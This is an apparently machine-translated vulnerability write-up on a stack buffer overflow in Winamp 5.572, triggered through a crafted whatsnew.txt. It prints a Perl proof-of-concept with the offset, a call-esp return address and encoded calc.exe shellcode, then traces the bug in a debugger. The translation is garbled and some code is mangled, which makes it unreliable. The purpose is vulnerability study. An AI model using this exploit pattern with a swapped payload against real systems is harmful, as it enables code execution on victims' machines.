Winamp, as one of the most mainstream music players in the 90, still has a large number of loyal fans. Of course there are many loopholes. The following is an analysis of a buffer overflow vulnerability that is triggered by opening the software's update history information.
0x01 Vulnerability Replay
The normal Whatsnew.txt file is located Winamp
in a folder, and the update history information is saved for the software. In order to reproduce the vulnerability, we need to overwrite the original whatsnew.txt of the specially constructed txt文件
. Then open Winamp, select "About Winamp" in the Help section of the menu bar, and select "Version history" in the popup dialog box. It triggers the exploit code and pops up a calculator for testing. Thank you for the implementation environment and POC code provided in this spring.
0x02 Exploit Code Analysis
Now that we have triggered the vulnerability, we can further analyze the cause of the vulnerability. Take a look at its POC code, which is written in the Perl language:
my $version="Winamp 5.572"; my $junk="\x41"X540; my $eip="\xad\x86\x0e\x07"; #Overwrite eip-070e86ad FFD4 call ESP nde.dllmy $nop="\x90"X -; my $shellcode=#windows/exec Cmd=calc.exe"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"."\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47"."\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32"."\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a"."\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e"."\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54"."\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64"."\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f"."\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f"."\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d"."\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44"."\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35"."\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a"."\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b"."\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57"."\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b"."\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63"."\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59"."\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73"."\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63"."\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33"."\x30\x47"; Open(MyFile,'>> whatsnew.txt'); PrintMyFile$version.$junk.$eip.$nop.$shellcode; Print "[+] Whatsnew.txt written.\n"; Print "[] Now copy it to your Winamp folder...\n"; Print "[] Run Winamp and hits [about Winamp]->[version history]\n";
First look at the bottom fourth statement, which is actually the format of the exploit code, is a total of five pieces of content, namely Version+junk+eip+nop+shellcode. The version of which is the current edition of the software, here is the 5.572 version; Junk is a fill code, here is 540 0x41, that is, capital A, the purpose of the fill is to the next return address of the overwrite; eip则是我们将要覆盖的
return address, here is 0X070E86AD The NOP position is 100 0x90; the last is ShellCode
the code.
Debugging of 0x03 Vulnerability
In order to debug this vulnerability, we can combine the construction of a good whatsnew.txt
.
First, locate the location where the vulnerability occurs, and then analyze the breakpoint at the appropriate location. We used to do it on a function similar to strcpy 下断点
, and then parse it one by one, or up and down on a function like fopen. Of course, the method is a variety of, regardless of which method, basically can achieve the purpose. So the needle for this program, since we already know that the program will open whatsnew.txt this file, then you might want to find the program in the string, and then analysis.
Start by OD
loading the Winamp.exe program, right-click in the Disassembly code area, and select all reference text strings in Find.
Then select the topmost entry to indicate a search from the beginning. Right-click, select Find text, enter the string name we want to find, and “whatsnew.txt”
then click OK:
Next we can look at these two statements separately. Perhaps these two statements themselves are not the arguments of the fopen function, but there is no relationship, I believe the distance is fopen
not too far. First, double-click the first result to the location of its disassembly code, and then look up and down in that position to find the location of the suspect file Open statement:
You can start with the next breakpoint at the 0x004015ee, and then press F9
the program to run, triggering the leak based on the previously mentioned steps
Hole, so the program stopped at the 0x004015ee position. The first thing to do here is to use the malloc
statement request size 0x20000
Memory space, the return value is the address of the allocated space, and here I am 0x0286c008. Then call Wfopen to open
whatsnew.txt
File. Call the Fread function again. By analyzing the parameters of this function, you know that the Fread function reads the contents of the file into the space just allocated. Then use the strncmp
function to do the comparison:
As you can see, this is the first 9 characters to verify that the file being read is whatsnew.txt
"Winamp 5." Verify that the next action is possible. This also explains why you need to add version information in the exploit code. Then came the most important position of the string copy function:
Here is a copy of the content read from the Whatsnew.txt file to the location of the address 0x00bdebac. We can Press
F8
Step over this function to look at:
You can see the method that the program is using call esp
, at which point the ESP holds the address 0x00bdede8, which falls exactly
0X90 is the section of NOP, behind these 0x90, is shellcode.
0X04 Summary
This time we are talking about ShellCode
vulnerability analysis based on other people's code. Visible even the code of Senior Man
, it doesn't necessarily work. Therefore, it is necessary for us to continue to try and study, to learn from others ' ideas, to
continuously improve.
Research on overflow vulnerability of Winamp stack